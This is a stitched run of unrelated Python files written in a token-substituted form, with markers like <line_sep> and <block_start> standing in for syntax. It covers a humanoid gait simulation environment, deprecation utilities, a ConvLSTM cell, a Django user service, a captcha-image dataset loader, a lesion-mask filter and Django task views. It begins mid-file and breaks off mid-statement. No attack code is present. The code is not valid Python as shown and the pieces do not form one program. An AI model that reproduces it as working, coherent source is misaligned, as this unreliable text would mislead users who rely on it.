ObservationType.JOINT_POS) ("right_knee" ObservationType.JOINT_POS) ("right_ankle" ObservationType.JOINT_POS) ("left_hip_frontal" ObservationType.JOINT_POS) ("left_hip_sagittal" ObservationType.JOINT_POS) ("left_knee" ObservationType.JOINT_POS) ("left_ankle" ObservationType.JOINT_POS) ("root" ObservationType.JOINT_VEL) ("right_hip_frontal" ObservationType.JOINT_VEL) ("right_hip_sagittal" ObservationType.JOINT_VEL) ("right_knee" ObservationType.JOINT_VEL) ("right_ankle" ObservationType.JOINT_VEL) ("left_hip_frontal" ObservationType.JOINT_VEL) ("left_hip_sagittal" ObservationType.JOINT_VEL) ("left_knee" ObservationType.JOINT_VEL) ("left_ankle" ObservationType.JOINT_VEL) ]<line_sep>collision_groups=[("floor" ["floor"]) ("left_foot" ["left_foot"]) ("right_foot" ["right_foot"])]<line_sep>super().__init__(model_path.as_posix() action_spec observation_spec gamma=gamma horizon=horizon n_substeps=1 n_intermediate_steps=n_intermediate_steps collision_groups=collision_groups)<if_stmt>use_muscles<block_start>self.external_actuator=MuscleSimulation(self._sim)<line_sep>self.info.action_space=spaces.Box(*self.external_actuator.get_action_space())<block_end><else_stmt><block_start>self.external_actuator=NoExternalSimulation()<block_end>low,high=self.info.action_space.low.copy() self.info.action_space.high.copy()<line_sep>self.norm_act_mean=(high+low)/2.0<line_sep>self.norm_act_delta=(high-low)/2.0<line_sep>self.info.action_space.low[:]=-1.0<line_sep>self.info.action_space.high[:]=1.0<if_stmt>goal_reward_params<is><none><block_start>goal_reward_params=dict()<block_end><if_stmt>goal_reward<eq>"trajectory"<or>goal_reward<eq>"com_vel_trajectory"<block_start>control_dt=self._sim.model.opt.timestep<times>self._n_intermediate_steps<line_sep>self.goal_reward=CompleteTrajectoryReward(self._sim control_dt **goal_reward_params)<block_end><elif_stmt>goal_reward<eq>"vel_profile"<block_start>self.goal_reward=VelocityProfileReward(self._sim **goal_reward_params)<block_end><elif_stmt>goal_reward<eq>"max_vel"<block_start>self.goal_reward=MaxVelocityReward(self._sim **goal_reward_params)<block_end><elif_stmt>goal_reward<is><none><block_start>self.goal_reward=NoGoalReward()<block_end><else_stmt><block_start><raise>NotImplementedError("The specified goal reward has not been"<concat>"implemented: " goal_reward)<block_end><if_stmt>goal_reward<eq>"trajectory"<block_start>self.reward_weights=dict(live_reward=0.10 goal_reward=0.40 traj_vel_reward=0.50 move_cost=0.10 fall_cost=0.00)<block_end><elif_stmt>goal_reward<eq>"com_vel_trajectory"<block_start>self.reward_weights=dict(live_reward=0.00 goal_reward=0.00 traj_vel_reward=1.00 move_cost=0.00 fall_cost=0.00)<block_end><else_stmt><block_start>self.reward_weights=dict(live_reward=0.10 goal_reward=0.90 traj_vel_reward=0.00 move_cost=0.10 fall_cost=0.00)<block_end>self.info.observation_space=spaces.Box(*self._get_observation_space())<line_sep>self.mean_grf=RunningAveragedWindow(shape=(6 ) window_size=n_intermediate_steps)<line_sep>self.mean_vel=RunningExpWeightedAverage(shape=(3 ) alpha=0.005)<line_sep>self.mean_obs=RunningAveragedWindow(shape=self.info.observation_space.shape window_size=obs_avg_window)<line_sep>self.mean_act=RunningAveragedWindow(shape=self.info.action_space.shape window_size=act_avg_window)<block_end><def_stmt>step self action<block_start>action=((action.copy()<times>self.norm_act_delta)+self.norm_act_mean)<line_sep>state,reward,absorbing,info=super().step(action)<line_sep>self.mean_obs.update_stats(state)<line_sep>self.mean_vel.update_stats(self._sim.data.qvel[0:3])<line_sep>avg_obs=self.mean_obs.mean<line_sep>avg_obs[13:16]=self.mean_vel.mean<line_sep><return>avg_obs reward absorbing info<block_end><def_stmt>render self<block_start><if_stmt>self._viewer<is><none><block_start>self._viewer=mujoco_py.MjViewer(self._sim)<line_sep>self._viewer._render_every_frame=<true><block_end>self._viewer.render()<block_end><def_stmt>_setup self<block_start>self.goal_reward.reset_state()<line_sep>start_obs=self._reset_model(qpos_noise=0.0 qvel_noise=0.0)<line_sep>start_vel=(self._sim.data.qvel[0:3]<if>(self.goal_reward<is><none><or>isinstance(self.goal_reward MaxVelocityReward))<else>self.goal_reward.get_observation())<line_sep>self.mean_vel.reset(start_vel)<line_sep>self.mean_obs.reset(start_obs)<line_sep>self.mean_act.reset()<line_sep>self.external_actuator.reset()<block_end><def_stmt>_reward self state action next_state<block_start>live_reward=1.0<line_sep>goal_reward=self.goal_reward(state action next_state)<line_sep>traj_vel_reward=0.0<if_stmt>isinstance(self.goal_reward HumanoidTrajectory)<block_start>traj_vel_reward=np.exp(-20.0<times>np.square(next_state[13]-next_state[33]))<block_end>move_cost=self.external_actuator.cost(state action/self.norm_act_delta next_state)<line_sep>fall_cost=0.0<if_stmt>self._has_fallen(next_state)<block_start>fall_cost=1.0<block_end>total_reward=self.reward_weights["live_reward"]<times>live_reward+self.reward_weights["goal_reward"]<times>goal_reward+self.reward_weights["traj_vel_reward"]<times>traj_vel_reward-self.reward_weights["move_cost"]<times>move_cost-self.reward_weights["fall_cost"]<times>fall_cost<line_sep><return>total_reward<block_end><def_stmt>_is_absorbing self state<block_start><return>(self._has_fallen(state)<or>self.goal_reward.is_absorbing(state)<or>self.external_actuator.is_absorbing(state))<block_end><def_stmt>_get_observation_space self<block_start>sim_low,sim_high=(self.info.observation_space.low[2:] self.info.observation_space.high[2:])<line_sep>grf_low,grf_high=(-np.ones((6 ))<times>np.inf np.ones((6 ))<times>np.inf)<line_sep>r_low,r_high=self.goal_reward.get_observation_space()<line_sep>a_low,a_high=self.external_actuator.get_observation_space()<line_sep><return>(np.concatenate([sim_low grf_low r_low a_low]) np.concatenate([sim_high grf_high r_high a_high]))<block_end><def_stmt>_reset_model self qpos_noise=0.0 qvel_noise=0.0<block_start>self._set_state(self._sim.data.qpos+np.random.uniform(low=-qpos_noise high=qpos_noise size=self._sim.model.nq) self._sim.data.qvel+np.random.uniform(low=-qvel_noise high=qvel_noise size=self._sim.model.nv))<line_sep><return>self._create_observation()<block_end><def_stmt>_set_state self qpos qvel<block_start>old_state=self._sim.get_state()<line_sep>new_state=mujoco_py.MjSimState(old_state.time qpos qvel old_state.act old_state.udd_state)<line_sep>self._sim.set_state(new_state)<line_sep>self._sim.forward()<block_end>@staticmethod<def_stmt>_has_fallen state<block_start>torso_euler=quat_to_euler(state[1:5])<line_sep><return>((state[0]<l>0.90)<or>(state[0]<g>1.20)<or>abs(torso_euler[0])<g>np.pi/12<or>(torso_euler[1]<l>-np.pi/12)<or>(torso_euler[1]<g>np.pi/8)<or>(torso_euler[2]<l>-np.pi/4)<or>(torso_euler[2]<g>np.pi/4))<block_end><def_stmt>_create_observation self<block_start>""" Creates full vector of observations: obs[0:13] -> qpos(from mujoco obs) obs[0] -> torso z pos obs[1:5] -> torso quaternion orientation obs[5:13] -> leg joints angle obs[13:27] -> qvel(from mujoco obs) obs[13:16] -> torso linear velocity obs[16:19] -> torso angular velocity obs[19:27] -> leg joints angular velocity obs[27:30] -> ground force obs[27:30] -> ground force on right foot(xyz) obs[30:33] -> ground force on left foot(xyz) obs[33:33+(len(goal_observation)] -> observations related to the goal obs[last_obs_id - len(ext_actuator_obs): last_obs_id] -> observations related to the external actuator """<line_sep>obs=np.concatenate([super(HumanoidGait self)._create_observation()[2:] self.mean_grf.mean/1000. self.goal_reward.get_observation() self.external_actuator.get_observation()]).flatten()<line_sep><return>obs<block_end><def_stmt>_preprocess_action self action<block_start>action=self.external_actuator.preprocess_action(action)<line_sep>self.mean_act.update_stats(action)<line_sep><return>self.mean_act.mean<block_end><def_stmt>_step_init self state action<block_start>self.external_actuator.initialize_internal_states(state action)<block_end><def_stmt>_compute_action self action<block_start>action=self.external_actuator.external_stimulus_to_joint_torques(action)<line_sep><return>action<block_end><def_stmt>_simulation_post_step self<block_start>grf=np.concatenate([self._get_collision_force("floor" "right_foot")[:3] self._get_collision_force("floor" "left_foot")[:3]])<line_sep>self.mean_grf.update_stats(grf)<block_end><def_stmt>_step_finalize self<block_start>self.goal_reward.update_state()<line_sep>self.external_actuator.update_state()<block_end><def_stmt>_get_body_center_of_mass_pos self body_name<block_start><return>self._sim.data.subtree_com[self._sim.model._body_name2id[body_name]]<block_end><block_end>
<import_stmt>numpy<as>np<import_stmt>warnings<line_sep>SCALARTYPES=(complex float int np.number)<def_stmt>is_scalar f<block_start>"""Determine if the input argument is a scalar. The function **is_scalar** returns *True* if the input is an integer, float or complex number. The function returns *False* otherwise. Parameters ---------- f : Any input quantity Returns ------- bool : - *True* if the input argument is an integer, float or complex number - *False* otherwise """<if_stmt>isinstance(f SCALARTYPES)<block_start><return><true><block_end><elif_stmt>isinstance(f np.ndarray)<and>f.size<eq>1<and>isinstance(f[0] SCALARTYPES)<block_start><return><true><block_end><return><false><block_end><def_stmt>as_array_n_by_dim pts dim<block_start>"""Ensures the given array will have *dim* columns. The function **as_array_n_by_dim** will examine the *pts* array, and coerce it to be at least if the number of columns is equal to *dim*. This is similar to the :func:`numpy.atleast_2d`, except that it ensures that then input has *dim* columns, and it appends a :data:`numpy.newaxis` to 1D arrays instead of prepending. Parameters ---------- pts : array_like array to check. dim : int The number of columns which *pts* should have Returns ------- (n_pts, dim) numpy.ndarray verified array """<if_stmt>type(pts)<eq>list<block_start>pts=np.array(pts)<block_end><if_stmt><not>isinstance(pts np.ndarray)<block_start><raise>TypeError("pts must be a numpy array")<block_end><if_stmt>dim<g>1<block_start>pts=np.atleast_2d(pts)<block_end><elif_stmt>len(pts.shape)<eq>1<block_start>pts=pts[: np.newaxis]<block_end><if_stmt>pts.shape[1]<ne>dim<block_start><raise>ValueError("pts must be a column vector of shape (nPts, {0:d}) not ({1:d}, {2:d})".format(*((dim )+pts.shape)))<block_end><return>pts<block_end><def_stmt>requires modules<block_start>"""Decorator to wrap functions with soft dependencies. This function was inspired by the `requires` function of pysal, which is released under the 'BSD 3-Clause "New" or "Revised" License'. https://github.com/pysal/pysal/blob/master/pysal/lib/common.py Parameters ---------- modules : dict Dictionary containing soft dependencies, e.g., {'matplotlib': matplotlib}. Returns ------- decorated_function : function Original function if all soft dependencies are met, otherwise it returns an empty function which prints why it is not running. """<line_sep># Check the required modules, add missing ones in the list `missing`. missing=[]<for_stmt>key,item modules.items()<block_start><if_stmt>item<is><false><block_start>missing.append(key)<block_end><block_end><def_stmt>decorated_function function<block_start>"""Wrap function."""<if_stmt><not>missing<block_start><return>function<block_end><else_stmt><block_start><def_stmt>passer *args **kwargs<block_start>print(("Missing dependencies: {d}.".format(d=missing)))<line_sep>print(("Not running `{}`.".format(function.__name__)))<block_end><return>passer<block_end><block_end><return>decorated_function<block_end><def_stmt>deprecate_class removal_version=<none> new_location=<none> future_warn=<false><block_start><if_stmt>future_warn<block_start>Warning=FutureWarning<block_end><else_stmt><block_start>Warning=DeprecationWarning<block_end><def_stmt>decorator cls<block_start>my_name=cls.__name__<line_sep>parent_name=cls.__bases__[0].__name__<line_sep>message=f"{my_name} has been deprecated, please use {parent_name}."<if_stmt>removal_version<is><not><none><block_start>message<augadd>(f" It will be removed in version {removal_version} of discretize.")<block_end><else_stmt><block_start>message<augadd>" It will be removed in a future version of discretize."<block_end># stash the original initialization of the class cls._old__init__=cls.__init__<def_stmt>__init__ self *args **kwargs<block_start>warnings.warn(message Warning)<line_sep>self._old__init__(*args **kwargs)<block_end>cls.__init__=__init__<if_stmt>new_location<is><not><none><block_start>parent_name=f"{new_location}.{parent_name}"<block_end>cls.__doc__=f""" This class has been deprecated, see `{parent_name}` for documentation"""<line_sep><return>cls<block_end><return>decorator<block_end><def_stmt>deprecate_module old_name new_name removal_version=<none> future_warn=<false><block_start><if_stmt>future_warn<block_start>Warning=FutureWarning<block_end><else_stmt><block_start>Warning=DeprecationWarning<block_end>message=f"The {old_name} module has been deprecated, please use {new_name}."<if_stmt>removal_version<is><not><none><block_start>message<augadd>f" It will be removed in version {removal_version} of discretize"<block_end><else_stmt><block_start>message<augadd>" It will be removed in a future version of discretize."<block_end>message<augadd>" Please update your code accordingly."<line_sep>warnings.warn(message Warning)<block_end><def_stmt>deprecate_property new_name old_name removal_version=<none> future_warn=<false><block_start><if_stmt>future_warn<block_start>Warning=FutureWarning<block_end><else_stmt><block_start>Warning=DeprecationWarning<block_end><if_stmt>removal_version<is><not><none><block_start>tag=f" It will be removed in version {removal_version} of discretize."<block_end><else_stmt><block_start>tag=" It will be removed in a future version of discretize."<block_end><def_stmt>get_dep self<block_start>class_name=type(self).__name__<line_sep>message=(f"{class_name}.{old_name} has been deprecated, please use {class_name}.{new_name}."+tag)<line_sep>warnings.warn(message Warning)<line_sep><return>getattr(self new_name)<block_end><def_stmt>set_dep self other<block_start>class_name=type(self).__name__<line_sep>message=(f"{class_name}.{old_name} has been deprecated, please use {class_name}.{new_name}."+tag)<line_sep>warnings.warn(message Warning)<line_sep>setattr(self new_name other)<block_end>doc=f""" `{old_name}` has been deprecated. See `{new_name}` for documentation. See Also -------- {new_name} """<line_sep><return>property(get_dep set_dep <none> doc)<block_end><def_stmt>deprecate_method new_name old_name removal_version=<none> future_warn=<false><block_start><if_stmt>future_warn<block_start>Warning=FutureWarning<block_end><else_stmt><block_start>Warning=DeprecationWarning<block_end><if_stmt>removal_version<is><not><none><block_start>tag=f" It will be removed in version {removal_version} of discretize."<block_end><else_stmt><block_start>tag=" It will be removed in a future version of discretize."<block_end><def_stmt>new_method self *args **kwargs<block_start>class_name=type(self).__name__<line_sep>warnings.warn(f"{class_name}.{old_name} has been deprecated, please use {class_name}.{new_name}."+tag Warning )<line_sep><return>getattr(self new_name)(*args **kwargs)<block_end>doc=f""" `{old_name}` has been deprecated. See `{new_name}` for documentation See Also -------- {new_name} """<line_sep>new_method.__doc__=doc<line_sep><return>new_method<block_end><def_stmt>deprecate_function new_function old_name removal_version=<none> future_warn=<false><block_start><if_stmt>future_warn<block_start>Warning=FutureWarning<block_end><else_stmt><block_start>Warning=DeprecationWarning<block_end>new_name=new_function.__name__<if_stmt>removal_version<is><not><none><block_start>tag=f" It will be removed in version {removal_version} of discretize."<block_end><else_stmt><block_start>tag=" It will be removed in a future version of discretize."<block_end><def_stmt>dep_function *args **kwargs<block_start>warnings.warn(f"{old_name} has been deprecated, please use {new_name}."+tag Warning )<line_sep><return>new_function(*args **kwargs)<block_end>doc=f""" `{old_name}` has been deprecated. See `{new_name}` for documentation See Also -------- {new_name} """<line_sep>dep_function.__doc__=doc<line_sep><return>dep_function<block_end># DEPRECATIONS isScalar=deprecate_function(is_scalar "isScalar" removal_version="1.0.0" future_warn=<false>)<line_sep>asArray_N_x_Dim=deprecate_function(as_array_n_by_dim "asArray_N_x_Dim" removal_version="1.0.0" future_warn=<false>)<line_sep>
<import_stmt>tensorflow<as>tf<import_from_stmt>network.Util smart_shape<line_sep>RNNCell=tf.nn.rnn_cell.RNNCell<line_sep>LSTMStateTuple=tf.nn.rnn_cell.LSTMStateTuple<def_stmt>_conv2d x W strides=<none><block_start><if_stmt>strides<is><none><block_start>strides=[1 1]<block_end><return>tf.nn.conv2d(x W strides=[1]+strides+[1] padding="SAME")<block_end><def_stmt>dynamic_conv_rnn cell inputs sequence_length=<none> initial_state=<none> dtype=<none> parallel_iterations=<none> swap_memory=<false> time_major=<false> scope=<none># inputs should have shape (time, batch, height, width, feature) <block_start>input_shape=smart_shape(inputs)<line_sep>num_units=cell.num_units()<line_sep>h,final_state=tf.nn.dynamic_rnn(cell inputs sequence_length initial_state dtype parallel_iterations swap_memory time_major scope)<line_sep>h=tf.reshape(h tf.stack([input_shape[0] input_shape[1] input_shape[2] input_shape[3] num_units]))<line_sep><return>h final_state<block_end># similar to https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/rnn/python/ops/core_rnn_cell_impl.py # for maximal flexibility we allow to pass the weights externally <class_stmt>ConvLSTMCell(RNNCell)<block_start><def_stmt>__init__ self num_units height width filter_size forget_bias=1.0 activation=tf.tanh W=<none> b=<none><block_start>self._num_units=num_units<line_sep>self._height=height<line_sep>self._width=width<line_sep>self._size=num_units<times>height<times>width<line_sep>self._forget_bias=forget_bias<line_sep>self._activation=activation<line_sep>self._filter_size=list(filter_size)<if_stmt>W<is><not><none><block_start>W_shape=W.get_shape().as_list()<assert_stmt>len(W_shape)<eq>4<assert_stmt>W_shape[:2]<eq>self._filter_size<assert_stmt>W_shape[-1]<eq>4<times>self._num_units<line_sep>self._W=W<block_end><else_stmt><block_start>self._W=<none><block_end><if_stmt>b<is><not><none><block_start>b_shape=b.get_shape().as_list()<assert_stmt>len(b_shape)<eq>1<assert_stmt>b_shape[0]<eq>4<times>self._num_units<line_sep>self._b=b<block_end><else_stmt><block_start>self._b=<none><block_end><block_end><def_stmt>__call__ self inputs state scope=<none>#inputs: `2-D` tensor with shape `[batch_size x input_size]`. #state: tuple with shapes `[batch_size x s] for s in self.state_size <block_start><with_stmt>tf.variable_scope(scope<or>type(self).__name__)# "ConvLSTMCell" # Parameters of gates are concatenated into one multiply for efficiency. <block_start>c,h=state<line_sep>concat=self._conv(inputs h)<line_sep># i = input_gate, j = new_input, f = forget_gate, o = output_gate i,j,f,o=tf.split(axis=3 num_or_size_splits=4 value=concat)<line_sep>batch=inputs.get_shape().as_list()[0]<if_stmt>batch<is><none><block_start>batch=tf.shape(inputs)[0]<block_end>i,j,f,o=[tf.reshape(x [batch -1])<for>x [i j f o]]<line_sep>new_c=(c<times>tf.sigmoid(f+self._forget_bias)+tf.sigmoid(i)<times>self._activation(j))<line_sep>new_h=self._activation(new_c)<times>tf.sigmoid(o)<line_sep>new_state=LSTMStateTuple(new_c new_h)<line_sep><return>new_h new_state<block_end><block_end><def_stmt>_conv self inputs h<block_start>batch=inputs.get_shape().as_list()[0]<if_stmt>batch<is><none><block_start>batch=tf.shape(inputs)[0]<block_end>n_input_features=inputs.get_shape().as_list()[-1]<line_sep>#inputs = tf.reshape(inputs, [batch, self._height, self._width, n_input_features]) h=tf.reshape(h [batch self._height self._width self._num_units])<line_sep>inp=tf.concat([inputs h] axis=3)<if_stmt>self._W<is><not><none><block_start>W=self._W<assert_stmt>W.get_shape().as_list()[2]<eq>n_input_features+self._num_units<block_end><else_stmt><block_start>W=tf.get_variable("W" shape=(self._filter_size+[n_input_features+self._num_units 4<times>self._num_units]))<block_end><if_stmt>self._b<is><not><none><block_start>b=self._b<block_end><else_stmt><block_start>zero_initializer=tf.constant_initializer(0.0 dtype=inputs.dtype)<line_sep>b=tf.get_variable("b" shape=(4<times>self._num_units) initializer=zero_initializer)<block_end>y=_conv2d(inp W)+b<line_sep><return>y<block_end><def_stmt>num_units self<block_start><return>self._num_units<block_end>@property<def_stmt>state_size self<block_start><return>LSTMStateTuple(self._size self._size)<block_end>@property<def_stmt>output_size self<block_start><return>self._size<block_end><block_end>
<import_stmt>apps.common.func.InitDjango<import_from_stmt>all_models.models TbUser TbAdminUserPermissionRelation<import_from_stmt>apps.common.func.WebFunc *<class_stmt>UserService(object)<block_start>@staticmethod<def_stmt>getUsers <block_start><return>TbUser.objects.all()<block_end>@staticmethod<def_stmt>getUserByLoginname loginname<block_start><return>TbUser.objects.filter(loginName=loginname)<block_end>@staticmethod<def_stmt>updateUser userData<block_start>tbModel=TbUser.objects.filter(id=userData["id"])<line_sep>tbModel.update(**userData)<block_end><block_end><if_stmt>__name__<eq>"__main__"# print(UserService.getUsers()[0]) #permissionDict = UserPermission.getUserPermissions("liyc", "/interfaceTest/HTTP_InterfaceListCheck") #print(permissionDict) # print("permissionDict:", permissionDict) #print("interfaceDict:", interfaceDict) <block_start>permissionsList=UserPermission.getOthersPermissions("liyc" ['lining02' 'gaozhe' 'qinjp' 'yongwy' 'pengjie' 'tanglu' 'hongln'] "/interfaceTest/HTTP_GlobalTextConfListPage")<line_sep># print("permissionsList:", permissionsList) <block_end># print(UserService.getUserByLoginname(UserService.getUsers()[0].loginName))
# -*- coding: UTF-8 -*- <import_stmt>os<import_from_stmt>torch.utils.data DataLoader Dataset<import_stmt>torchvision.transforms<as>transforms<import_from_stmt>PIL Image<import_stmt>one_hot_encoding<as>ohe<import_stmt>captcha_setting<import_stmt>numpy<as>np<import_stmt>cv2<class_stmt>mydataset(Dataset)<block_start><def_stmt>__init__ self folder folder_2=<none> transform=<none><block_start>self.train_image_file_paths=[os.path.join(folder image_file)<for>image_file os.listdir(folder)]<if_stmt>(folder_2<is><not><none>)<block_start>self.train_image_file_paths=self.train_image_file_paths+[os.path.join(folder_2 image_file)<for>image_file os.listdir(folder_2)]<block_end>print(len(self.train_image_file_paths))<line_sep>self.transform=transform<block_end><def_stmt>__len__ self<block_start><return>len(self.train_image_file_paths)<block_end><def_stmt>__getitem__ self idx<block_start>image_root=self.train_image_file_paths[idx]<line_sep>image_name=image_root.split('/')[-1]<line_sep>image=Image.open(image_root)<line_sep>#print(image) fix_size=(160 60)<line_sep>image=image.resize(fix_size)<line_sep># print(image_name) <if_stmt>self.transform<is><not><none><block_start>image=self.transform(image)<block_end># print(image_name) <if_stmt>('_'<in>image_name)<block_start>label=ohe.encode(image_name.split('_')[0].upper())<block_end><else_stmt><block_start>label=ohe.encode(image_name.split('.')[0].upper())<block_end><return>image label image_name<block_end><block_end><def_stmt>gaussian_blur img<block_start>image=np.array(img)<line_sep>image_blur=cv2.GaussianBlur(image (5 5) 3)<line_sep>new_image=image_blur<line_sep><return>new_image<block_end>transform=transforms.Compose([# transforms.ColorJitter(), transforms.Grayscale() # transforms.Lambda(gaussian_blur), transforms.ToTensor() # transforms.Normalize(mean=[0.9], std=[0.4]), ])<def_stmt>get_train_data_loader s=<true> d=200<block_start>print('data path: ' captcha_setting.TRAIN_DATASET_PATH)<line_sep># dataset = mydataset(captcha_setting.TRAIN_DATASET_PATH, captcha_setting.TRAIN_DATASET_PATH_2, transform=transform) dataset=mydataset(captcha_setting.TRAIN_DATASET_PATH transform=transform)<line_sep><return>DataLoader(dataset batch_size=512 shuffle=s)<block_end><def_stmt>get_test_train_data_loader s=<true> d=256<block_start>dataset=mydataset(captcha_setting.TRAIN_DATASET_PATH transform=transform)<line_sep><return>DataLoader(dataset batch_size=d shuffle=s)<block_end><def_stmt>get_test_data_loader s=<false> d=1<block_start>print(captcha_setting.TEST_DATASET_PATH)<line_sep>dataset=mydataset(captcha_setting.TEST_DATASET_PATH transform=transform)<line_sep><return>DataLoader(dataset batch_size=d shuffle=s)<block_end><def_stmt>get_predict_data_loader s=<true> d=1<block_start>dataset=mydataset(captcha_setting.PREDICT_DATASET_PATH transform=transform)<line_sep><return>DataLoader(dataset batch_size=d shuffle=s)<block_end>
<import_stmt>numpy<as>np<import_from_stmt>scipy misc<import_stmt>os<import_stmt>scipy.io<import_from_stmt>PIL Image<def_stmt>filter base_root crops_list='crops_LiTS_gt.txt' input_config='masked_out_lesion' results_list='detection_lesion_example' th=0.5<block_start>crops_list=base_root+'utils/crops_list/'+crops_list<line_sep>results_list=base_root+'detection_results/'+results_list+'/soft_results.txt'<if_stmt>crops_list<is><not><none><block_start><with_stmt>open(crops_list)<as>t<block_start>crops_lines=t.readlines()<block_end><block_end>input_results_path=base_root+'results/'+input_config<line_sep>output_results_path=base_root+'results/det_'+input_config<if_stmt><not>os.path.exists(os.path.join(output_results_path))<block_start>os.makedirs(os.path.join(output_results_path))<block_end><if_stmt>results_list<is><not><none><block_start><with_stmt>open(results_list)<as>t<block_start>results_lines=t.readlines()<block_end><block_end><for_stmt>i range(105 131)<block_start>folder_name=str(i)<line_sep>images=[]<line_sep>nm=folder_name+'/'<for_stmt>x results_lines<block_start><if_stmt>nm<in>x<block_start>images.append(x)<block_end><block_end>slices_names=[]<if_stmt><not>os.path.exists(os.path.join(output_results_path folder_name))<block_start>os.makedirs(os.path.join(output_results_path folder_name))<block_end><for_stmt>j range(len(images))<block_start>slices_names.append(images[j].split()[0])<block_end>unique_slices_names=np.unique(slices_names)<for_stmt>x range(len(unique_slices_names))<block_start>total_mask=[]<for_stmt>l range(len(slices_names))<block_start><if_stmt>slices_names[l]<eq>unique_slices_names[x]<block_start><if_stmt>float(images[l].split()[3])<g>th<block_start>aux_mask=np.zeros([512 512])<line_sep>x_bb=int(float(images[l].split()[1]))<line_sep>y_bb=int(float(images[l].split()[2].split('\n')[0]))<line_sep>aux_name=images[l].split()[0]+'.png'<line_sep>total_patch=(np.array(Image.open(os.path.join(input_results_path aux_name)) dtype=np.uint8))/255.0<line_sep>cropped_patch=total_patch[x_bb:(x_bb+80) y_bb:(y_bb+80)]<line_sep>aux_mask[x_bb:(x_bb+80) y_bb:(y_bb+80)]=cropped_patch<line_sep>total_mask.append(aux_mask)<block_end><block_end><block_end><if_stmt>len(total_mask)<g>0<block_start><if_stmt>len(total_mask)<g>1<block_start>summed_mask=np.sum(total_mask axis=0)<block_end><else_stmt><block_start>summed_mask=np.array(total_mask)[0]<block_end>thresholded_total_mask=np.greater(total_mask 0.0).astype(float)<line_sep>summed_thresholded_total_mask=np.sum(thresholded_total_mask axis=0)<line_sep>summed_thresholded_total_mask[summed_thresholded_total_mask<eq>0.0]=1.0<line_sep>summed_mask=np.divide(summed_mask summed_thresholded_total_mask)<line_sep>summed_mask=summed_mask<times>255.0<line_sep>name=unique_slices_names[x].split('.')[0]+'.png'<line_sep>scipy.misc.imsave(os.path.join(output_results_path name) summed_mask)<block_end><block_end><block_end><for_stmt>i range(len(crops_lines))<block_start>result=crops_lines[i].split(' ')<if_stmt>len(result)<g>2<block_start>id_img,bool_zoom,mina,maxa,minb,maxb=result<block_end><else_stmt><block_start>id_img,bool_zoom=result<block_end><if_stmt>int(id_img.split('/')[-2])<g>104<block_start><if_stmt><not>os.path.exists(os.path.join(output_results_path id_img+'.png'))<block_start>mask=np.zeros([512 512])<line_sep>misc.imsave(os.path.join(output_results_path id_img+'.png') mask)<block_end><block_end><block_end><block_end>
<import_stmt>datetime<import_stmt>json<import_stmt>re<import_stmt>os<import_stmt>requests<import_stmt>time<import_stmt>threading<import_stmt>pickle<import_from_stmt>django.core.mail send_mail<import_from_stmt>django.db connection<import_from_stmt>django.http JsonResponse<import_from_stmt>django.shortcuts render_to_response render<import_from_stmt>django.core.cache cache<import_from_stmt>ApiManager.utils schedule<import_from_stmt>ApiManager.utils.case_utils run_case_by_id<import_from_stmt>ApiManager.utils.forms TaskModelForm<import_from_stmt>ApiManager.models ProjectInfo ModuleInfo TestCaseInfo EnvInfo TaskInfo ReportInfo TaskFailedRecord<import_from_stmt>frame.utils.common get_ajax_msg dataToJson<import_from_stmt>ApiManager.utils.forms get_validate_form_msg<import_from_stmt>ApiManager.utils.utils pagination_for_objects<import_from_stmt>Joy_QA_Platform.settings EMAIL_FROM<import_from_stmt>Joy_QA_Platform.configs AUTH_ADD_TASK AUTH_DELETE AUTH_UPDATE AUTH_VIEW EMAIL_SUFFIX<line_sep>is_timer_start=<false><line_sep>run_task_list=[]<line_sep>run_job_dict={}<def_stmt>task_list request<block_start><if_stmt>request.method<eq>"GET"<block_start><return>render(request 'api/task_list.html')<block_end><elif_stmt>request.method<eq>"POST"<block_start>index=int(request.POST.get('index'))<line_sep>env_name_dic={}<line_sep>project_name_dic={}<line_sep>module_name_dic={}<line_sep>results=filter_tasks_for_user(request.user TaskInfo.objects.filter().order_by('-id') AUTH_VIEW)<line_sep>tasks=pagination_for_objects(results index)<if_stmt>tasks<is><not><none><and>len(tasks)<g>0<block_start><for_stmt>task tasks<block_start>append_env_dict(task env_name_dic)<line_sep>append_project_dict(task project_name_dic)<line_sep>append_module_dict(task module_name_dic)<block_end><block_end>count=len(results)<line_sep>task_info_list=[]<for_stmt>task tasks<block_start>task_dict=task2Dict(task)<line_sep>task_info_list.append(task_dict)<block_end>data=dataToJson(task_info_list)<line_sep><return>JsonResponse(get_ajax_msg(1 1 '获取任务列表成功' {'tasks':data 'count':count 'currPage':index 'envInfo':env_name_dic 'proInfo':project_name_dic 'moduleInfo':module_name_dic}))<block_end><block_end><def_stmt>task_create request<block_start><if_stmt>request.method<eq>'GET'<block_start><return>render(request 'api/task_new.html')<block_end><elif_stmt>request.user.has_perm(AUTH_ADD_TASK)<block_start><if_stmt>request.method<eq>'POST'<block_start>model_form=TaskModelForm(request.POST)<if_stmt>model_form.is_valid()<block_start>task_name=request.POST.get('task_name')<line_sep>env_id=request.POST.get('belong_env')<line_sep>project_id=request.POST.get('belong_project')<line_sep>module_id=request.POST.get('belong_module')<line_sep>emails=request.POST.get('receiver_email')<line_sep>start_time=datetime.datetime.fromtimestamp(int(request.POST.get('start_time'))/1000)<if_stmt>request.POST.get('is_loop')<eq>'true'<block_start>is_loop=<true><block_end><elif_stmt>request.POST.get('is_loop')<eq>'false'<block_start>is_loop=<false><block_end>interval_minute=request.POST.get('interval_minute')<line_sep>error_msg=<none><if_stmt><not>EnvInfo.objects.filter(id=env_id).exists()<block_start>error_msg='此环境不存在'<block_end><elif_stmt><not>ProjectInfo.objects.filter(id=project_id).exists()<block_start>error_msg='此项目不存在'<block_end><elif_stmt><not>ModuleInfo.objects.filter(id=module_id).exists()<block_start>error_msg='此模块不存在'<block_end><elif_stmt>TaskInfo.objects.filter(task_name=task_name belong_module_id=module_id).exists()<block_start>error_msg='已存在此任务'<block_end><elif_stmt>start_time<le>datetime.datetime.now()<block_start>error_msg='任务开始时间早于当前时间'<block_end><elif_stmt>is_loop<and>int(interval_minute)<l>1<block_start>error_msg='任务开始循环间隔时间不能小于1分钟'<block_end><elif_stmt><not>validate_emails(emails.split(';'))<block_start>error_msg='邮箱格式错误'<block_end><if_stmt>error_msg<is><not><none><block_start><return>JsonResponse(get_ajax_msg(0 0 error_msg 